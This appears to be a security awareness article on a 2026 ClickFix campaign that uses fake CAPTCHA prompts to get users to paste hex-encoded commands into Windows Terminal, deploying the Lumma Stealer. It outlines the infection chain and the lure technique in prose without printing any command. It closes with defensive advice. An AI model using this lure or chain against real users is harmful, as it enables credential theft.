That CAPTCHA Fix Asked You to Open Windows Terminal—It Was Deploying an Infostealer

You visit a website. A popup appears telling you to verify your connection or fix a CAPTCHA error. The instructions seem simple: press Windows + X, open Terminal, and paste a short command. The page looks professional. The instructions sound reasonable. You paste the command.

In the time it takes to press Enter, a hex encoded PowerShell script has downloaded a renamed 7 Zip utility, extracted a compressed payload, disabled your antivirus, established persistence on your machine, and deployed the Lumma Stealer infostealer. Your saved passwords from Chrome and Edge are already being exfiltrated.

Microsoft Threat Intelligence flagged the campaign in early March 2026, calling it an evolution of the ClickFix social engineering technique that has been circulating since 2025. The new variant specifically targets Windows Terminal, a tool that developers and power users open routinely, making the malicious instruction blend into normal behavior.

How the Social Engineering Works

The attack begins with a deceptive web page posing as a verification prompt, CAPTCHA check, or troubleshooting guide. The page instructs users to copy a command and paste it into Windows Terminal, framing the action as something harmless like verifying a connection or fixing a display error.

The critical innovation is targeting Windows + X followed by I, which opens Windows Terminal. Previous ClickFix variants used the Win + R shortcut to open the Run dialog, which is more commonly associated with system commands and might raise suspicion. Terminal, by contrast, is a legitimate administrative tool that many developers open every day. Pasting a command into it feels routine.

The commands themselves are hex encoded, making them look like random strings rather than executable instructions. To a non technical user, a hex string looks no more threatening than a verification code.

The Infection Chain

Once the victim pastes the command, the infection triggers a surprisingly elaborate chain of events. The first pathway downloads a renamed 7 Zip utility alongside compressed payloads, then extracts components that establish persistence and disable antivirus protections before deploying the infostealer.

A secondary pathway uses batch scripts and VBScript executed through Windows utilities like MSBuild, with some variants accessing cryptocurrency blockchain infrastructure in a technique sometimes called EtherHiding. This approach stores command and control data on the blockchain, making it effectively impossible to take down.

The Lumma Stealer payload specifically targets browser credentials by injecting itself into Chrome and Edge processes to siphon stored login credentials and other browser data. Any password saved in your browser's password manager becomes accessible to the attacker within seconds of infection.

Why This Attack Is Effective

ClickFix exploits a fundamental trust gap. Security training teaches people to avoid clicking suspicious links and downloading unknown files. It rarely teaches them to be suspicious of pasting text into their own system tools.

The attack also bypasses most automated security controls. Email filters catch malicious attachments. Web filters block known malware download URLs. But there is no standard security product that monitors what a user pastes into Windows Terminal, because that is a legitimate action that millions of users perform every day.

This creates a social engineering sweet spot: the action is common enough to seem normal, technical enough to discourage scrutiny, and powerful enough to grant full system access.

How to Protect Yourself

The defense against ClickFix is awareness, not technology. No legitimate website will ever ask you to open Windows Terminal and paste a command. This is not a normal verification step. It is not a CAPTCHA fix. It is not a connection test. Any site that requests this is attempting to execute code on your machine.

• Never paste commands from websites into Terminal, PowerShell, or Command Prompt. This is the single most important rule.
• Be skeptical of "fix" instructions. Legitimate CAPTCHA systems do not require command line interaction.
• Use a standalone password manager instead of browser built in password storage, which Lumma Stealer specifically targets.
• Enable two factor authentication on critical accounts so that stolen passwords alone are not sufficient for access.

For organizations, this campaign reinforces the need for security awareness training that goes beyond "don't click suspicious links." Employees need to understand that pasting commands into system tools is functionally equivalent to running a program from an untrusted source.